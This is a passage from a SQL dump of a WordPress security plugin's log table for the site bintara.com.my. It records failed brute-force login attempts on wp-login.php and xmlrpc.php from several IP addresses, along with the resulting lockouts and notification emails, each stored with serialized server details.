";s:27:\"XYYhrXkXpgmG5P@iB8kvlQAAAJg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071533.7311\";s:12:\"REQUEST_TIME\";s:10:\"1569071533\";}}','notice','2019-09-21 13:12:15','2019-09-21 13:12:14',18313576,19611664,'https://bintara.com.my/wp/xmlrpc.php',1,0,'171.244.50.204'),(25802,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"95\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYhq3kXpgmG5P@iB8kvlAAAAIg\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"171.244.50.204\";s:11:\"REMOTE_PORT\";s:5:\"44742\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYhq3kXpgmG5P@iB8kvlAAAAIg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071531.3926\";s:12:\"REQUEST_TIME\";s:10:\"1569071531\";}}','notice','2019-09-21 13:12:12','2019-09-21 13:12:11',17796992,19288760,'https://bintara.com.my/wp/wp-login.php',1,0,'171.244.50.204'),(25801,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:21:\"/wordpress/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYhhLfBTP0kPOVnb8jtvwAAAEc\";s:12:\"REDIRECT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:11:\"142.4.1.222\";s:11:\"REMOTE_PORT\";s:5:\"59472\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:43:\"https://bintara.com.my/wordpress/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:21:\"/wordpress/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYhhLfBTP0kPOVnb8jtvwAAAEc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071492.9715\";s:12:\"REQUEST_TIME\";s:10:\"1569071492\";}}','notice','2019-09-21 13:11:34','2019-09-21 13:11:33',18313576,19607504,'https://bintara.com.my/wordpress/xmlrpc.php',1,0,'142.4.1.222'),(25800,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:23:\"/wordpress/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"102\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYhgnkXpgmG5P@iB8kveQAAAI0\";s:12:\"REDIRECT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"REMOTE_ADDR\";s:11:\"142.4.1.222\";s:11:\"REMOTE_PORT\";s:5:\"58412\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:45:\"https://bintara.com.my/wordpress/wp-login.php\";s:10:\"SCRIPT_URL\";s:23:\"/wordpress/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYhgnkXpgmG5P@iB8kveQAAAI0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071490.1254\";s:12:\"REQUEST_TIME\";s:10:\"1569071490\";}}','notice','2019-09-21 13:11:31','2019-09-21 13:11:30',17797392,19287296,'https://bintara.com.my/wordpress/wp-login.php',1,0,'142.4.1.222'),(25799,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/2019/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/2019/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/2019/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYheHkXpgmG5P@iB8kvcwAAAIM\";s:12:\"REDIRECT_URL\";s:16:\"/2019/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:13:\"89.221.250.18\";s:11:\"REMOTE_PORT\";s:5:\"57714\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/2019/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/2019/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYheHkXpgmG5P@iB8kvcwAAAIM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071480.8759\";s:12:\"REQUEST_TIME\";s:10:\"1569071480\";}}','notice','2019-09-21 13:11:22','2019-09-21 13:11:21',18313472,19611696,'https://bintara.com.my/2019/xmlrpc.php',1,0,'89.221.250.18'),(23658,0,'notification_center','send_scheduled','a:2:{s:13:\"notifications\";a:1:{i:0;s:6:\"digest\";}s:6:\"silent\";b:0;}','debug','2019-09-04 20:13:08','2019-09-04 20:13:05',17650048,18113704,'http://bintara.com.my/',1,0,'52.13.3.174'),(23659,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"176.31.117.193\";s:11:\"REMOTE_PORT\";s:5:\"44476\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XXDtgd7XyeFCbG-KWI7GZAAAAEo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1567681926.284\";s:12:\"REQUEST_TIME\";s:10:\"1567681926\";}}','notice','2019-09-05 11:12:07','2019-09-05 11:12:06',17695544,19187096,'https://bintara.com.my/wp-login.php',1,0,'176.31.117.193'),(25733,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:43:51\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:43:51\";s:14:\"lockout_expire\";s:19:\"2019-09-21 19:58:51\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 11:58:51\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:43:52','2019-09-21 11:43:51',17883864,19289616,'https://bintara.com.my/test/wp-login.php',1,0,'178.62.71.94'),(25734,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:43:52','2019-09-21 11:43:51',18089584,19289616,'https://bintara.com.my/test/wp-login.php',1,0,'178.62.71.94'),(25735,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/test/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYM@TDrcQxTmGrCWuaMPgAAAcI\";s:12:\"REDIRECT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:12:\"178.62.71.94\";s:11:\"REMOTE_PORT\";s:5:\"43588\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYM@TDrcQxTmGrCWuaMPgAAAcI\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066233.5187\";s:12:\"REQUEST_TIME\";s:10:\"1569066233\";}}','notice','2019-09-21 11:43:54','2019-09-21 11:43:53',18313992,19610904,'https://bintara.com.my/test/xmlrpc.php',1,0,'178.62.71.94'),(25736,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/wp/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"96\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYNUjDrcQxTmGrCWuaMSgAAAdc\";s:12:\"REDIRECT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"REMOTE_ADDR\";s:15:\"188.165.250.134\";s:11:\"REMOTE_PORT\";s:5:\"55203\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/wp/wp-login.php\";s:10:\"SCRIPT_URL\";s:16:\"/wp/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYNUjDrcQxTmGrCWuaMSgAAAdc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569066322.7929\";s:12:\"REQUEST_TIME\";s:10:\"1569066322\";}}','notice','2019-09-21 11:45:24','2019-09-21 11:45:23',17796552,19286104,'https://bintara.com.my/wp/wp-login.php',1,0,'188.165.250.134'),(25737,0,'lockout','username-lockout::','a:13:{s:6:\"module\";s:11:\"brute_force\";s:4:\"host\";b:0;s:7:\"user_id\";b:0;s:8:\"username\";s:0:\"\";s:14:\"module_details\";a:5:{s:4:\"type\";s:11:\"brute_force\";s:6:\"reason\";s:27:\"too many bad login attempts\";s:4:\"host\";i:5;s:4:\"user\";i:10;s:6:\"period\";i:5;}s:11:\"whitelisted\";b:0;s:11:\"blacklisted\";b:0;s:12:\"lockout_type\";s:11:\"brute_force\";s:13:\"lockout_start\";s:19:\"2019-09-21 19:45:23\";s:17:\"lockout_start_gmt\";s:19:\"2019-09-21 11:45:23\";s:14:\"lockout_expire\";s:19:\"2019-09-21 20:00:23\";s:18:\"lockout_expire_gmt\";s:19:\"2019-09-21 12:00:23\";s:16:\"lockout_username\";s:0:\"\";}','action','2019-09-21 11:45:24','2019-09-21 11:45:23',17881416,19286104,'https://bintara.com.my/wp/wp-login.php',1,0,'188.165.250.134'),(25738,0,'notification_center','send::lockout','a:2:{s:10:\"recipients\";a:1:{i:0;s:19:\"faiz@bintara.com.my\";}s:7:\"subject\";s:43:\"[bintara.com.my/] Site Lockout Notification\";}','debug','2019-09-21 11:45:24','2019-09-21 